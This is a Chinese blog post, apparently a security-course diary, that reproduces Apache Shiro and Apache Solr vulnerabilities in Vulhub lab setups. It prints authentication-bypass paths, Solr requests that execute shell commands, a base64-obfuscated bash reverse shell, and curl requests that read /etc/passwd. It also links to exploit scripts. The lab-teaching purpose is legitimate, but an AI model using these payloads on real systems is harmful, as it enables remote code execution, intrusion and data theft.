第64天:服务攻防-框架安全&CVE复现&Apache Shiro&Apache Solr

最新推荐文章于 2024-07-07 17:22:02 发布
最新推荐文章于 2024-07-07 17:22:02 发布
阅读量1.2k 收藏 26
点赞数 38
文章标签: 安全 apache solr
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71529930/article/details/137930292
版权

目录

思维导图

案例一:Apache Shiro-组件框架安全

shiro反序列化 cve_2016_4437

CVE-2020-17523

CVE-2020-1957

案例二:Apache Solr-组件框架安全

 远程命令执行 RCE(CVE-2017-12629)

任意文件读取 AND 命令执行(CVE-2019-17558)

远程命令执行漏洞(CVE-2019-0193)

文件读取与SSRF漏洞

思维导图

案例一:Apache Shiro-组件框架安全

阿里云漏洞库: https://avd.aliyun.com/search?q=shiro

常见漏洞

Apache Shiro <= 1.2.4 默认密钥致命令执行漏洞【CVE-2016-4483】
Apache Shiro < 1.3.2 验证绕过漏洞【CVE-2016-2807】
Apache Shiro < 1.4.2 cookie oracle padding 漏洞 【CVE-2019-12442】
Apache Shiro < 1.5.2 验证绕过漏洞 【CVE-2020-1957】
Apache Shiro < 1.5.3 验证绕过漏洞 【CVE-2020-11989】
Apahce Shiro < 1.6.0 验证绕过漏洞 【CVE-2020-13933】
Apahce Shiro < 1.7.1 权限绕过漏洞 【CVE-2020-17523】

Apache Shiro 是一个强大且易用的 Java 安全框架,用于身份验证、授权、密码和会话管理

判断:大多会发生在登录处,返回包里包含 remeberMe=deleteMe 字段

shiro反序列化 cve_2016_4437

靶场环境:

反序列化可以直接利用工具

执行效果

命令执行

CVE-2020-17523

影响版本:Apache Shiro < 1.7.1

靶场环境:  https://github.com/jweny/shiro-cve-2020-17523

搭建起来

访问/admin/xx会自动跳转到login,意思时不登陆不能访问

但是访问/admin/%20会自动绕过登录

查看版本的位置

CVE-2020-1957

影响范围:Apache Shiro < 1.5.3

靶场环境: https://vulhub.org/#/environments/shiro/CVE-2020-1957/

启动起来以后需要登录

访问admin时会自动跳转到login.html

 Poc

/xxx/..;/admin/

直接绕过登录限制,直接登录admin

案例二:Apache Solr-组件框架安全

Apache Solr 是一个开源的搜索服务,使用 Java 语言开发,主要基于 HTTP 和Apache Lucene 实现的。Solr 是一个高性能,采用 Java5 开发,基于 Lucene 的全文搜索服务器。

漏洞库: https://avd.aliyun.com/search?q=solr

常见漏洞

远程命令执行 RCE(CVE-2017-12629)
远程命令执行 XXE(CVE-2017-12629)
任意文件读取 AND 命令执行(CVE-2019-17558)
远程命令执行漏洞(CVE-2019-0192)
远程命令执行漏洞(CVE-2019-0193)
未授权上传漏洞(CVE-2020-13957)
Apache Solr SSRF (CVE-2021-27905)

 远程命令执行 RCE(CVE-2017-12629)

solr一般都有这样的配置页面

访问抓包发送到repeater,设置一个listener

POST /solr/demo/config HTTP/1.1
Host: your-ip
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 158

{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/success"]}}

然后设置包update,触发刚才的操作listener

POST /solr/demo/update HTTP/1.1
Host: your-ip
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 15

[{"id":"test"}]

进入docker中查看

任意文件读取 AND 命令执行(CVE-2019-17558)

靶场环境:  Vulhub - Docker-Compose file for vulnerability environment

脚本地址:https://github.com/jas502n/solr_rce 
需要用python2执行,vulfocus上靶场可能有问题了,无法执行,执行效果如图
另一款交互式脚本

https://github.com/zhzyker/exphub/blob/master/solr/cve-2019-17558_cmd.py

远程命令执行漏洞(CVE-2019-0193)

靶场环境:Vulhub - Docker-Compose file for vulnerability environment

启动该环境除了正常步骤以外,还需要

docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db -force

影响版本:Apache Solr < 8.2.0 版本

该漏洞真实环境要利用一般得先登录

利用过程

创建文件

<dataConfig>
  <dataSource type="URLDataSource"/>
  <script><![CDATA[
          function poc(){ java.lang.Runtime.getRuntime().exec("touch /tmp/success");
          }
  ]]></script>
  <document>
    <entity name="stackoverflow"
            url="https://stackoverflow.com/feeds/tag/solr"
            processor="XPathEntityProcessor"
            forEach="/feed"
            transformer="script:poc" />
  </document>
</dataConfig>

 

把代码换成反弹shell的代码

<dataConfig>
    <dataSource type="URLDataSource"/>
    <script><![CDATA[
        function poc(){ java.lang.Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3Mi4xMzIvNTU2NiAwPiYx}|{base64,-d}|{bash,-i}");}
]]></script>
    <document>
    <entity name="stackoverflow"
        url="https://stackoverflow.com/feeds/tag/solr"
        processor="XPathEntityProcessor"
        forEach="/feed"
        transformer="script:poc" />
    </document>
</dataConfig>

开启监听 成功反弹shell

文件读取与SSRF漏洞

靶场位置:https://vulhub.org/#/environments/solr/Remote-Streaming-Fileread/

首先先获取数据库名

http://your-ip:8983/solr/admin/cores?indexInfo=false&wt=json

获取数据库名

触发访问

curl -i -s -k -X $'POST' \
     -H $'Content-Type: application/json' --data-binary $'{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}' \
     $'http://your-ip:8983/solr/demo/config'

读取任意文件

curl -i -s -k'http://your-ip:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'

可以利用ssrf探测内网做信息收集,这里用dnslog做简单的测试

xiaojiesec
关注
  • 38
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
tiki组件:CVE-2020-15906 && CVE-2021-26119复现
11-24
这两个CVE(Common Vulnerabilities and Exposures)——CVE-2020-15906 和 CVE-2021-26119,都是针对Tiki组件的安全漏洞,可能导致恶意攻击者能够获取未经授权的访问权限或执行恶意代码。 **CVE-2020-15906**,被...
CVE-2020-36184:CVE-2020-36184 && Jackson-databind RCE
05-29
2.9.10.8之前的FasterXML jackson-databind 2.x错误地处理了与org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource相关的序列化小工具和键入之间的交互。 如何进行RCE pom.xml <?xml version=...
shiro反序列化漏洞
热门推荐
Azjj
04-29 1万+
shrio反序列化漏洞 一、漏洞介绍 Shiro 是 Java 的一个安全框架Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。 参考文章:ht...
Apache两个解析漏洞复现及防御方法
阿道夫的博客
01-28 3284
1、网络安全理论知识(2)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
Apache 安全配置方法
日拱一卒无有尽,功不唐捐终入海
08-29 5217
Apache易于安装并且相当容易管理。不幸的是,许多Apache的安装由于为完全的陌生者提供了关于自己服务器的太多”有帮助”的信息,例如 Apache的版本号和与操作系统相关的信息。通过这种信息,一个潜在的攻击者就可以追踪特定的可以影响你的系统的破坏性漏洞,特别是你没有能够保持所有补丁的更新的话情况更为严重。如此一来,攻击者无需反复试验就可以确切地知道你在运行什么,从而可以调整其攻击方法。 要防止服
Apache防御DDOS攻击
雷雪松
04-06 2931
mod_evasive_1.10.1分布式拒绝服务(DDoS:Distributed Denial of Service)攻击指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DDoS攻击,从而成倍地提高拒绝服务攻击的威力。因被DDOS攻击和恶意刷新导致Apache运行异常,占用资源过大,现在新发现一个很好的解决方法.基本上都通过安装mod_evasive模块得到了较...
Apache的防攻击
逸天的Blog
07-29 1899
看看这个对你有没有帮助 A. IBM AIX 4.3.X B. Sun Solaris 7 C. Compaq Tru64 UNIX 5.X D. HP HP-UX 11.0 (research ongoing) E. Linux kernel 2.2 (tested both SuSE Linux 7.0 和 RedHat 7.0) F. FreeBSD G. IRIX 6.5.10 下面叙述的
第59服务攻防-中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx
weixin_71529930的博客
04-13 1038
war文件是一种web应用程序格式,包含了一个项目中所有源码的集合并按一定的目录结构组织,由于将所有文件合并成一个文件,因此节省了文件的传输时间。发送到repeater,文章末尾加入,php代码,右侧可以看到上传路径。利用icon目录必须是一个真实存在的目录,%2e为 "."如果cgi和cgid模块被设置了,那么可以进行命令执行。访问大马 根目录/jshell/jshell.jsp。找一个jsp编写的大马,把他压缩为war后缀的。搭建起来以后,抓包,put方式上传。上传php文件,会显示不能上传。
第59-服务攻防-中间件安全&CVE 复现&IIS&Apache&Tomcat&Nginx
weixin_52529261的博客
02-07 899
本文章涉及Apache、Tomcat及Nginx等中间件重要的CVE漏洞复现
第六十四 服务攻防-框架安全&CVE复现Apache shiro&Apache Solr
ZL_1618的博客
05-02 1623
1、开发框架-PHP-Laravel-Thinkphp 2、开发框架-Javaweb-St2-Spring 3.开发框架-Python-django-Flask 4、开发框架-Javascript-Node.js-JQuery 5、其他框架Java-Apache Shiro&Apache Sorl
第60-服务攻防-中间件安全&CVE 复现&Weblogic&&Jboss&Jenkins&GlassFish
weixin_52529261的博客
02-15 1386
主要学习了解Weblogic、JBoos、Jenkins和GlassFish四个中间件的常见CVE、未授权和弱口令等漏洞。
tiki组件:CVE-2020-15906 &amp;&amp; CVE-2021-26119复现
11-24
tiki组件:CVE-2020-15906 && CVE-2021-26119复现
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
第61:权限提升-Redis&Postgre&令牌窃取&进程注入1
08-03
本文以“第61:权限提升-Redis&Postgre&令牌窃取&进程注入1”为主题,探讨了四种不同的提权策略,分别是通过数据库应用提权、Redis数据库权限提升、PostgreSQL数据库权限提升以及Windows系统的令牌窃取和进程注入...
VPS拨号服务器:独享的高效与安全
qq_34245974的博客
07-06 532
本文将深入探讨VPS拨号服务器的独享特性,以及它如何提供更高效的服务和更强的安全保障。总之,VPS拨号服务器的独享特性为用户提供了一个高效、安全且灵活的网络环境,特别适合那些对服务器性能和安全性有高要求的业务需求。随着技术的不断进步,我们有理由相信,VPS拨号服务器将在未来的互联网架构中扮演越来越重要的角色。VPS拨号服务器是一种特殊的服务器,它结合了传统的VPS功能与动态IP地址分配能力。数据隔离:独享服务器保证了数据的隔离性,降低了数据泄露的风险。自定义安全策略:可以根据业务需求实施定制化的安全措施。
绝区肆--2024 年AI安全状况
最新发布
RamendeusStudio的博客
07-07 367
随着人工智能系统变得越来越强大和普及,与之相关的安全问题也越来越多。让我们来看看 2024 年人工智能安全的现状——评估威胁、分析漏洞、审查有前景的防御策略,并推测这一关键领域的未来可能如何。
亚信安全发布2024年6月威胁态势,高危漏洞猛增60%
亚信安全官方账号的博客
07-04 260
亚信安全发布2024年6月威胁态势
CVE-2020-14882​&14883:Weblogic RCE复现1
08-03
近期,两个关键性漏洞 CVE-2020-14882 和 CVE-2020-14883 被发现,这些漏洞的存在使得未经授权的远程攻击者能够通过精心构造的GET请求,在受影响的Weblogic Server上执行任意代码。这两个漏洞影响了多个版本,包括...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值